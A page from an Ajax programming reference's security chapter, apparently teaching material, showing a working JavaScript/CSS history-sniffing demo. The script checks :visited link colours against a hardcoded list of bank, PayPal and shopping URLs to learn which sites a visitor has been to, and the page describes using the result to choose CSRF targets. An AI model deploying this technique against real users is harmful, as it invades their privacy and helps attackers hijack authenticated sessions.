Skip to content

banner ajax
The Complete Reference: Ajax

Examples: History Stealing

Stealing History with JavaScript and CSS







Scenarios

An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them. They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.

Note: The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Chapter 7 : Security - History</title>
<link rel="stylesheet" href="http://ajaxref.com/ch7/global.css" type="text/css" media="screen" />
<style type="text/css">
 
    a.stealhistory:link{color:#FF0000}
    a.stealhistory:visited{color:#00FF00}
</style>
<script src="http://ajaxref.com/ch7/utilities.js" type="text/javascript">
</script>
<script type="text/javascript">
 
 
 
function getHistoryLength()
{
    var responseOutput = document.getElementById("responseOutput");    
    responseOutput.innerHTML = "<strong>Length of History through Javascript: </strong>" + window.history.length;
}
 
function getHistory(stealhistorysites)
{
    var responseOutput = document.getElementById("responseOutput");    
    responseOutput.innerHTML = "<strong>Checking History through Javascript/CSS. </strong><br />";
    responseOutput.innerHTML += "<br /><strong>You have been to: </strong><br />";
    for (var i=0;i<stealhistorysites.length;i++)
    {
        if (checkHistory(stealhistorysites[i]))
            responseOutput.innerHTML += stealhistorysites[i] + "<br />";
    } 
}
 
function checkHistory(url) 
{
    var found = false;
    var link = document.createElement("a");
    link.className = "stealhistory";       
    link.href = url;       
    link.appendChild(document.createTextNode("stealhistory"));
    link.style.visibility = "hidden";              
    document.body.appendChild(link); 
          
    var color = getStyle(link,"color").toLowerCase();      
    document.body.removeChild(link);       
    if(color == "rgb(0, 255, 0)" || color == "#00ff00")           
        found = true;
    
    return found;
}
 
window.onload = function() 
{ 
    /* obviously this is hardcoded but we could easily ask for a set of things to check for via a remote communication request */
    var stealhistorysites = new Array("http://www.google.com/", "http://ajaxref.com/ch7/history.html", "https://www.wellsfargo.com/", "http://www.bankofamerica.com/", "http://www.washingtonmutual.com/", "http://www.amazon.com/", "https://home.americanexpress.com/", "https://www.paypal.com/");
    
    document.requestForm.checkHistoryLength.onclick=function(){getHistoryLength();};
    document.requestForm.checkVisited.onclick=function(){getHistory(stealhistorysites);};
    
    var websites = document.getElementById("websites");
    websites.innerHTML = "<strong>We will check for history of the following sites:</strong><ul>";
    for (var i=0;i<stealhistorysites.length;i++)
        websites.innerHTML += "<li>" + stealhistorysites[i] + "</li>";
    websites.innerHTML += "</ul><br />";
        
    
}
</script>
 
</head>
<body>
<div class="content">
<h1>Stealing History with JavaScript and CSS</h1><br />
<form action="#" name="requestForm">
    <input type="button" value="Check History Length" name="checkHistoryLength" />
    <input type="button" value="Check for Visited URLs" name="checkVisited"  />
</form>
</div>
 
<br />
<div id="websites" class="response"></div>
<br /><br />
<div id="responseOutput" class="response"></div>
 
<br /><br />
<div id="scenarios">
    <h3>Scenarios</h3>
    <p>An evil site or an XSS compromised site may contain this history checking script to see if you have been to sites that interest them.  They will then use a CSRF to attempt to perform some action at that site as you if you are still authenticated via a cookie.</p>
    <p><em>Note:</em> The example only checks for a few sites but it could check quite a number in a very short time or use a communications request to fetch the list of sites or URLs it is interested in checking for.</p>
</div>
</body>
</html>